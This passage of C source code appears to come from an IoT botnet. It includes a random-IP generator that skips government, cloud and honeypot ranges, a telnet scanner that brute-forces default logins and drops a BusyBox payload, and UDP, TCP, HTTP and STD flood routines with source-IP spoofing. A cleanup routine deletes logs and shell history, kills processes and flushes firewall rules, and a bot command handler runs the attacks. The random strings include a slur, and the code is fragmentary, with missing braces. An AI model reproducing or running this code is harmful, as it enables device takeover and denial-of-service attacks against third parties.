(ipState[0] == 162 && ipState[1] >= 45 && ipState[1] < 47) || //CIA
(ipState[0] == 163 && ipState[1] >= 205 && ipState[1] < 207) || //NASA Kennedy Space Center
(ipState[0] == 164 && ipState[1] >= 45 && ipState[1] < 50) || //NASA Kennedy Space Center
(ipState[0] == 164 && ipState[1] >= 217 && ipState[1] < 233) || //NASA Kennedy Space Center
(ipState[0] == 169 && ipState[1] >= 252 && ipState[1] < 254) || //U.S. Department of State
(ipState[0] == 199 && ipState[1] >= 121 && ipState[1] < 254) || //Naval Air Systems Command, VA
(ipState[0] == 205 && ipState[1] >= 1 && ipState[1] < 118) || //Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
(ipState[0] == 207 && ipState[1] >= 60 && ipState[1] < 62) || //FBI controlled Linux servers & IPs/IP-Ranges
(ipState[0] == 104 && ipState[1] >= 16 && ipState[1] < 31) || //Cloudflare
(ipState[0] == 188 && ipState[1] == 166) || //Digital Ocean
(ipState[0] == 188 && ipState[1] == 226) || //Digital Ocean
(ipState[0] == 159 && ipState[1] == 203) || //Digital Ocean
(ipState[0] == 162 && ipState[1] == 243) || //Digital Ocean
(ipState[0] == 45 && ipState[1] == 55) || //Digital Ocean
(ipState[0] == 178 && ipState[1] == 62) || //Digital Ocean
(ipState[0] == 104 && ipState[1] == 131) || //Digital Ocean
(ipState[0] == 104 && ipState[1] == 236) || //Digital Ocean
(ipState[0] == 107 && ipState[1] == 170) || //Digital Ocean
(ipState[0] == 138 && ipState[1] == 197) || //Digital Ocean
(ipState[0] == 138 && ipState[1] == 68) || //Digital Ocean
(ipState[0] == 139 && ipState[1] == 59) || //Digital Ocean
(ipState[0] == 146 && ipState[1] == 185 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean
(ipState[0] == 163 && ipState[1] == 47 && ipState[2] >= 10 && ipState[2] < 11) || //Digital Ocean
(ipState[0] == 174 && ipState[1] == 138 && ipState[2] >= 1 && ipState[2] < 127) || //Digital Ocean
(ipState[0] == 192 && ipState[1] == 241 && ipState[2] >= 128 && ipState[2] < 255) || //Digital Ocean
(ipState[0] == 198 && ipState[1] == 199 && ipState[2] >= 64 && ipState[2] < 127) || //Digital Ocean
(ipState[0] == 198 && ipState[1] == 211 && ipState[2] >= 96 && ipState[2] < 127) || //Digital Ocean
(ipState[0] == 207 && ipState[1] == 154 && ipState[2] >= 192 && ipState[2] < 255) || //Digital Ocean
(ipState[0] == 37 && ipState[1] == 139 && ipState[2] >= 1 && ipState[2] < 31) || //Digital Ocean
(ipState[0] == 67 && ipState[1] == 207 && ipState[2] >= 64 && ipState[2] < 95) || //Digital Ocean
(ipState[0] == 67 && ipState[1] == 205 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean
(ipState[0] == 80 && ipState[1] == 240 && ipState[2] >= 128 && ipState[2] < 143) || //Digital Ocean
(ipState[0] == 82 && ipState[1] == 196 && ipState[2] >= 1 && ipState[2] < 15) || //Digital Ocean
(ipState[0] == 95 && ipState[1] == 85 && ipState[2] >= 8 && ipState[2] < 63) || //Digital Ocean
(ipState[0] == 64 && ipState[1] == 237 && ipState[2] >= 32 && ipState[2] < 43) || //Choopa & Vultr
(ipState[0] == 185 && ipState[1] == 92 && ipState[2] >= 220 && ipState[2] < 223) || //Choopa & Vultr
(ipState[0] == 104 && ipState[1] == 238 && ipState[2] >= 128 && ipState[2] < 191) || //Choopa & Vultr
(ipState[0] == 209 && ipState[1] == 222 && ipState[2] >= 1 && ipState[2] < 31) || //Choopa & Vultr
(ipState[0] == 208 && ipState[1] == 167 && ipState[2] >= 232 && ipState[2] < 252) || //Choopa & Vultr
(ipState[0] == 66 && ipState[1] == 55 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr
(ipState[0] == 45 && ipState[1] == 63 && ipState[2] >= 1 && ipState[2] < 127) || //Choopa & Vultr
(ipState[0] == 216 && ipState[1] == 237 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr
(ipState[0] == 108 && ipState[1] == 61) || //Choopa & Vultr
(ipState[0] == 45 && ipState[1] == 76) || //Choopa & Vultr
(ipState[0] == 185 && ipState[1] == 11 && ipState[2] >= 144 && ipState[2] < 148) || //Blazingfast & Nforce
(ipState[0] == 185 && ipState[1] == 56 && ipState[2] >= 21 && ipState[2] < 23) || //Blazingfast & Nforce
(ipState[0] == 185 && ipState[1] == 61 && ipState[2] >= 136 && ipState[2] < 139) || //Blazingfast & Nforce
(ipState[0] == 185 && ipState[1] == 62 && ipState[2] >= 187 && ipState[2] < 191) || //Blazingfast & Nforce
(ipState[0] == 66 && ipState[1] == 150 && ipState[2] >= 120 && ipState[2] < 215) || //Blazingfast & Nforce
(ipState[0] == 66 && ipState[1] == 151 && ipState[2] >= 137 && ipState[2] < 139) || //Blazingfast & Nforce
(ipState[0] == 64 && ipState[1] == 94 && ipState[2] >= 237 && ipState[2] < 255) || //Blazingfast & Nforce
(ipState[0] == 63 && ipState[1] == 251 && ipState[2] >= 19 && ipState[2] < 21) || //Blazingfast & Nforce
(ipState[0] == 70 && ipState[1] == 42 && ipState[2] >= 73 && ipState[2] < 75) || //Blazingfast & Nforce
(ipState[0] == 74 && ipState[1] == 91 && ipState[2] >= 113 && ipState[2] < 115) || //Blazingfast & Nforce
(ipState[0] == 74 && ipState[1] == 201 && ipState[2] >= 56 && ipState[2] < 58) || //Blazingfast & Nforce
(ipState[0] == 188 && ipState[1] == 209 && ipState[2] >= 48 && ipState[2] < 53) || //Blazingfast & Nforce
(ipState[0] == 188 && ipState[1] == 165) || //OVH
(ipState[0] == 149 && ipState[1] == 202) || //OVH
(ipState[0] == 151 && ipState[1] == 80) || //OVH
(ipState[0] == 164 && ipState[1] == 132) || //OVH
(ipState[0] == 176 && ipState[1] == 31) || //OVH
(ipState[0] == 167 && ipState[1] == 114) || //OVH
(ipState[0] == 178 && ipState[1] == 32) || //OVH
(ipState[0] == 178 && ipState[1] == 33) || //OVH
(ipState[0] == 37 && ipState[1] == 59) || //OVH
(ipState[0] == 37 && ipState[1] == 187) || //OVH
(ipState[0] == 46 && ipState[1] == 105) || //OVH
(ipState[0] == 51 && ipState[1] == 254) || //OVH
(ipState[0] == 51 && ipState[1] == 255) || //OVH
(ipState[0] == 5 && ipState[1] == 135) || //OVH
(ipState[0] == 5 && ipState[1] == 196) || //OVH
(ipState[0] == 5 && ipState[1] == 39) || //OVH
(ipState[0] == 91 && ipState[1] == 134) || //OVH
(ipState[0] == 104 && ipState[1] == 200 && ipState[2] >= 128 && ipState[2] < 159) || //Total Server Solutions
(ipState[0] == 107 && ipState[1] == 152 && ipState[2] >= 96 && ipState[2] < 111) || //Total Server Solutions
(ipState[0] == 107 && ipState[1] == 181 && ipState[2] >= 160 && ipState[2] < 189) || //Total Server Solutions
(ipState[0] == 172 && ipState[1] == 98 && ipState[2] >= 64 && ipState[2] < 95) || //Total Server Solutions
(ipState[0] == 184 && ipState[1] == 170 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions
(ipState[0] == 192 && ipState[1] == 111 && ipState[2] >= 128 && ipState[2] < 143) || //Total Server Solutions
(ipState[0] == 192 && ipState[1] == 252 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions
(ipState[0] == 192 && ipState[1] == 40 && ipState[2] >= 56 && ipState[2] < 59) || //Total Server Solutions
(ipState[0] == 198 && ipState[1] == 8 && ipState[2] >= 81 && ipState[2] < 95) || //Total Server Solutions
(ipState[0] == 199 && ipState[1] == 116 && ipState[2] >= 112 && ipState[2] < 119) || //Total Server Solutions
(ipState[0] == 199 && ipState[1] == 229 && ipState[2] >= 248 && ipState[2] < 255) || //Total Server Solutions
(ipState[0] == 199 && ipState[1] == 36 && ipState[2] >= 220 && ipState[2] < 223) || //Total Server Solutions
(ipState[0] == 199 && ipState[1] == 58 && ipState[2] >= 184 && ipState[2] < 187) || //Total Server Solutions
(ipState[0] == 206 && ipState[1] == 220 && ipState[2] >= 172 && ipState[2] < 175) || //Total Server Solutions
(ipState[0] == 208 && ipState[1] == 78 && ipState[2] >= 40 && ipState[2] < 43) || //Total Server Solutions
(ipState[0] == 208 && ipState[1] == 93 && ipState[2] >= 192 && ipState[2] < 193) || //Total Server Solutions
(ipState[0] == 66 && ipState[1] == 71 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions
(ipState[0] == 98 && ipState[1] == 142 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions
(ipState[0] == 107 && ipState[1] >= 20 && ipState[1] < 24) || //Amazon
(ipState[0] == 35 && ipState[1] >= 159 && ipState[1] < 183) || //Amazon
(ipState[0] == 52 && ipState[1] >= 1 && ipState[1] < 95) || //Amazon
(ipState[0] == 52 && ipState[1] >= 95 && ipState[1] < 255) || //Amazon + Microsoft
(ipState[0] == 54 && ipState[1] >= 64 && ipState[1] < 95) || //Amazon + Microsoft
(ipState[0] == 54 && ipState[1] >= 144 && ipState[1] < 255) || //Amazon + Microsoft
(ipState[0] == 13 && ipState[1] >= 52 && ipState[1] < 60) || //Amazon + Microsoft
(ipState[0] == 13 && ipState[1] >= 112 && ipState[1] < 115) || //Amazon + Microsoft
(ipState[0] == 163 && ipState[1] == 172) || //ONLINE SAS
(ipState[0] == 51 && ipState[1] >= 15 && ipState[1] < 255) || //ONLINE SAS
(ipState[0] == 79 && ipState[1] == 121 && ipState[2] >= 128 && ipState[2] < 255) || //Some more
(ipState[0] == 212 && ipState[1] == 47 && ipState[2] >= 224 && ipState[2] < 255) || //Some more
(ipState[0] == 89 && ipState[1] == 34 && ipState[2] >= 96 && ipState[2] < 97) || //Some more
(ipState[0] == 219 && ipState[1] >= 216 && ipState[1] < 231) || //Some more
(ipState[0] == 23 && ipState[1] >= 94 && ipState[1] < 109) || //Some more
(ipState[0] == 178 && ipState[1] >= 62 && ipState[1] < 63) || //Some more
(ipState[0] == 106 && ipState[1] >= 182 && ipState[1] < 189) || //Some more
(ipState[0] == 106 && ipState[1] >= 184) || //Some more
(ipState[0] == 106 && ipState[1] == 105) || //Honeypot
(ipState[0] == 34 && ipState[1] >= 245 && ipState[1] < 255) || //Some more
(ipState[0] == 87 && ipState[1] >= 97 && ipState[1] < 99) || //Some more
(ipState[0] == 86 && ipState[1] == 208) || //Some more
(ipState[0] == 86 && ipState[1] == 209) || //Some more
(ipState[0] == 193 && ipState[1] == 164) || //Some more
(ipState[0] == 120 && ipState[1] >= 103 && ipState[1] < 108) || //Ministry of Education Computer Science
(ipState[0] == 188 && ipState[1] == 68) || //Ministry of Education Computer Science
(ipState[0] == 78 && ipState[1] == 46) || //Ministry of Education Computer Science
(ipState[0] == 224)) { //Multicast
ipState[0] = rand() % 223;
ipState[1] = rand() % 255;
ipState[2] = rand() % 255;
ipState[3] = rand() % 255;
char ip[16] = {0};
szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
return inet_addr(ip);
in_addr_t GRIP(in_addr_t netmask) {
in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
return tmp ^ ( rand_cmwc() & ~netmask);
int socket_connect(char *host, in_port_t port) {
struct hostent *hp;
struct sockaddr_in addr;
int on = 1, sock;
if ((hp = gethostbyname(host)) == NULL) return 0;
bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
if (sock == -1) return 0;
if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1)
return 0;
return sock;
void botnetTScan(int wait_usec, int maxfds) { //Telnet scanner from prometheus creds to @narcotixx for that
int i, res, num_tmps, j;
char buf[128], cur_dir;
int max = maxfds;
fd_set fdset;
struct timeval tv;
socklen_t lon;
int valopt;
srand(time(NULL) ^ rand_cmwc());
char line[256];
char* buffer;
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
buffer = malloc(BUFFER_SIZE + 1);
memset(buffer, 0, BUFFER_SIZE + 1);
struct telstate_t fds[max];
memset(fds, 0, max * (sizeof(int) + 1));
for(i = 0; i < max; i++) {
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].complete = 1;
fds[i].sockbuf = buffer;
for(num_tmps = 0; tmpdirs[++num_tmps] != 0; );
while(1) {
for(i = 0; i < max; i++) {
if(fds[i].totalTimeout == 0) {
fds[i].totalTimeout = time(NULL);
switch(fds[i].state) {
case 0: {
if(fds[i].complete == 1) {
char *tmp = fds[i].sockbuf;
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].sockbuf = tmp;
fds[i].ip = GIP();
else if(fds[i].complete == 0) {
if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) {
fds[i].complete = 1;
if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) {
fds[i].complete = 1;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
dest_addr.sin_addr.s_addr = fds[i].ip;
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
if(fds[i].fd == -1) continue;
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
} else {
advance_state(&fds[i], 1);
case 1: {
FD_SET(fds[i].fd, &fdset);
tv.tv_sec = 0;
tv.tv_usec = wait_usec;
res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
if(res == 1) {
lon = sizeof(int);
valopt = 0;
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if(valopt) {
} else {
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
advance_state(&fds[i], 2);
else if(res == -1) {
if(fds[i].totalTimeout + 5 < time(NULL)) {
case 2: {
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
if(contains_fail(fds[i].sockbuf)) {
advance_state(&fds[i], 0);
} else {
advance_state(&fds[i], 3);
if(fds[i].totalTimeout + 7 < time(NULL)) {
case 3: {
if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
advance_state(&fds[i], 4);
case 4: {
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
if(contains_fail(fds[i].sockbuf)) {
advance_state(&fds[i], 0);
} else {
advance_state(&fds[i], 5);
if(fds[i].totalTimeout + 3 < time(NULL)) {
case 5: {
if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
advance_state(&fds[i], 6);
case 6: {
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) {
fds[i].totalTimeout = time(NULL);
if(contains_fail(fds[i].sockbuf)) {
advance_state(&fds[i], 0);
else if(contains_success(fds[i].sockbuf)) {
if(fds[i].complete == 2) {
advance_state(&fds[i], 7);
} else {
botnetPrint(KadenCommStock, "Execution Bruted -> %s [ %s:%s ]", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
advance_state(&fds[i], 7);
} else {
if(fds[i].totalTimeout + 7 < time(NULL)) {
case 7: {
fds[i].totalTimeout = time(NULL);
if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) <0);
if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
if(send(fds[i].fd, BusyBoxPayload, strlen(BusyBoxPayload), MSG_NOSIGNAL) < 0) {
if(fds[i].totalTimeout + 25 < time(NULL)) {
if(fds[i].complete !=3){
void makeRandomStr(unsigned char *buf, int length) {
int i = 0;
for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
unsigned short csum (unsigned short *buf, int count) {
register uint64_t sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (uint16_t)(~sum);
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo {
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
return output;
void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
char request[512], buffer[1];
for (i = 0; i < power; i++) {
sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
if (fork()) {
while (end > time(NULL)) {
socket = socket_connect(host, port);
if (socket != 0) {
write(socket, request, strlen(request));
read(socket, buffer, 1);
void SendHTTPHex(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
char request[512], buffer[1], hex_payload[2048];
sprintf(hex_payload, "\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA");
for (i = 0; i < power; i++) {
sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, hex_payload, host, useragents[(rand() % 36)]);
if (fork()) {
while (end > time(NULL)) {
socket = socket_connect(host, port);
if (socket != 0) {
write(socket, request, strlen(request));
read(socket, buffer, 1);
void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + packetSize;
iph->id = rand_cmwc();
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = protocol;
iph->check = 0;
iph->saddr = source;
iph->daddr = dest;
int sclose(int fd) {
if(3 > fd) return 1;
return 0;
void UpdateNameSrvs()
uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
if (access("/etc/resolv.conf", F_OK) != -1) {
const char* resd = "nameserver\nnameserver\n";
size_t resl = strlen(resd);
write(fhandler, resd, resl);
} else { return; }
void CleanDevice()
system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
system("rm -rf /var/log/wtmp");
system("rm -rf /tmp/*");
system("rm -rf /bin/netstat");
system("iptables -F");
system("pkill -9 busybox");
system("pkill -9 perl");
system("pkill -9 python");
system("service iptables stop");
system("/sbin/iptables -F; /sbin/iptables -X");
system("service firewalld stop");
system("rm -rf ~/.bash_history");
system("history -c");
void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval, int sleepcheck, int sleeptime) {
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
if(port == 0) dest_addr.sin_port = rand_cmwc();
else dest_addr.sin_port = htons(port);
if(getHost(target, &dest_addr.sin_addr)) return;
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
register unsigned int pollRegister;
pollRegister = pollinterval;
if(spoofit == 32) {
int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(!sockfd) {
#ifdef PRINTS
botnetPrint(KadenCommStock, "Failed opening raw socket.");
unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
if(buf == NULL) return;
memset(buf, 0, packetsize + 1);
makeRandomStr(buf, packetsize);
int end = time(NULL) + timeEnd;
register unsigned int i = 0;
register unsigned int ii = 0;
while(1) {
sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
if(i == pollRegister) {
if(port == 0) dest_addr.sin_port = rand_cmwc();
if(time(NULL) > end) break;
i = 0;
if(ii == sleepcheck) {
ii = 0;
} else {
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
if(!sockfd) {
#ifdef PRINTS
botnetPrint(KadenCommStock, "Failed opening raw socket.");
int tmp = 1;
if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
#ifdef PRINTS
botnetPrint(KadenCommStock, "Failed setting raw headers mode.");
int counter = 50;
while(counter--) {
srand(time(NULL) ^ rand_cmwc());
in_addr_t netmask;
if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
else netmask = ( ~((1 << (32 - spoofit)) - 1) );
unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
struct iphdr *iph = (struct iphdr *)packet;
struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GRIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
udph->len = htons(sizeof(struct udphdr) + packetsize);
udph->source = rand_cmwc();
udph->dest = (port == 0 ? rand_cmwc() : htons(port));
udph->check = 0;
makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
iph->check = csum ((unsigned short *) packet, iph->tot_len);
int end = time(NULL) + timeEnd;
register unsigned int i = 0;
register unsigned int ii = 0;
while(1) {
sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
udph->source = rand_cmwc();
udph->dest = (port == 0 ? rand_cmwc() : htons(port));
iph->id = rand_cmwc();
iph->saddr = htonl( GRIP(netmask) );
iph->check = csum ((unsigned short *) packet, iph->tot_len);
if(i == pollRegister) {
if(time(NULL) > end) break;
i = 0;
if(ii == sleepcheck) {
ii = 0;
void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval) {
register unsigned int pollRegister;
pollRegister = pollinterval;
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
if(port == 0) dest_addr.sin_port = rand_cmwc();
else dest_addr.sin_port = htons(port);
if(getHost(target, &dest_addr.sin_addr)) return;
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if(!sockfd) {
#ifdef PRINTS
botnetPrint(KadenCommStock, "Failed opening raw socket.");
int tmp = 1;
if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
#ifdef PRINTS
botnetPrint(KadenCommStock, "Failed setting raw headers mode.");
in_addr_t netmask;
if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
else netmask = ( ~((1 << (32 - spoofit)) - 1) );
unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
struct iphdr *iph = (struct iphdr *)packet;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GRIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
tcph->source = rand_cmwc();
tcph->seq = rand_cmwc();
tcph->ack_seq = 0;
tcph->doff = 5;
if(!strcmp(flags, "all")) {
tcph->syn = 1;
tcph->rst = 1;
tcph->fin = 1;
tcph->ack = 1;
tcph->psh = 1;
} else {
unsigned char *pch = strtok(flags, ",");
while(pch) {
if(!strcmp(pch, "syn")) {
tcph->syn = 1;
} else if(!strcmp(pch, "rst")) {
tcph->rst = 1;
} else if(!strcmp(pch, "fin")) {
tcph->fin = 1;
} else if(!strcmp(pch, "ack")) {
tcph->ack = 1;
} else if(!strcmp(pch, "psh")) {
tcph->psh = 1;
} else {
#ifdef PRINTS
botnetPrint(KadenCommStock, "Invalid flag \"%s\"", pch);
pch = strtok(NULL, ",");
tcph->window = rand_cmwc();
tcph->check = 0;
tcph->urg_ptr = 0;
tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
tcph->check = tcpcsum(iph, tcph);
iph->check = csum ((unsigned short *) packet, iph->tot_len);
int end = time(NULL) + timeEnd;
register unsigned int i = 0;
while(1) {
sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
iph->saddr = htonl( GRIP(netmask) );
iph->id = rand_cmwc();
tcph->seq = rand_cmwc();
tcph->source = rand_cmwc();
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
iph->check = csum ((unsigned short *) packet, iph->tot_len);
if(i == pollRegister) {
if(time(NULL) > end) break;
i = 0;
void sendSTD(unsigned char *ip, int port, int secs) {
int iSTD_Sock;
iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
time_t start = time(NULL);
struct sockaddr_in sin;
struct hostent *hp;
hp = gethostbyname(ip);
bzero((char*) &sin,sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = port;
unsigned int a = 0;
char *randstrings[] = {"VSzNC0CJti3ouku", "yhJyMAqx7DZa0kg", "1Cp9MEDMN6B5L1K", "niggaNiggerXds", "muchpower", "9XdSldsd", "Xddsslslsls", "eNxERkyrfR", "qHjTXcMbzH", "chickennuggets", "ilovecocaine", "666666", "88888888", "0nnf0l20im", "uq7ajzgm0a", "smac", "ParasJhaIsADumbFag", "stdudpbasedflood", "bitcoin1", "password", "eRaGonBotNet", "suckmyFOUND", "guardiacivil", "2xoJTsbXunuj", "QiMH8CGJyOj9", "abcd1234", "GLEQWXHAJPWM", "ABCDEFGHI", "Eragon", "qbotbotnet", "lizardsquad", "aNrjBnTRi", "1QD8ypG86", "IVkLWYjLe", "kadenthegod", "satoriskidsnet"};
char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))];
if (a >= 50)
send(iSTD_Sock, STD2_STRING, STD_PIGZ, 0);
connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
if (time(NULL) >= start + secs)
a = 0;
void processCmd(int argc, unsigned char *argv[]) {
if(!strcmp(argv[0], "TELNET")) {
if(!strcmp(argv[1], "OFF")) {
if(botnetPid == 0) return;
kill(botnetPid, 9);
botnetPid = 0;
if(!strcmp(argv[1], "ON")) {
if(botnetPid != 0) return;
uint32_t parent;
parent = fork();
int threads = 1000;
int timeout = 10;
if (parent > 0) { botnetPid = parent; return;}
else if(parent == -1) return;
botnetTScan(timeout, threads);
if(!strcmp(argv[0], "UDP")) {
if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65536 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1)) {
unsigned char *ip = argv[1];
int port = atoi(argv[2]);
int time = atoi(argv[3]);
int spoofed = atoi(argv[4]);
int packetsize = atoi(argv[5]);
int pollinterval = (argc > 6 ? atoi(argv[6]) : 1000);
int sleepcheck = (argc > 7 ? atoi(argv[7]) : 1000000);
int sleeptime = (argc > 8 ? atoi(argv[8]) : 0);
if(strstr(ip, ",") != NULL) {
unsigned char *hi = strtok(ip, ",");
while(hi != NULL) {
if(!listFork()) {
sendUDP(hi, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
hi = strtok(NULL, ",");
} else {
if (!listFork()){
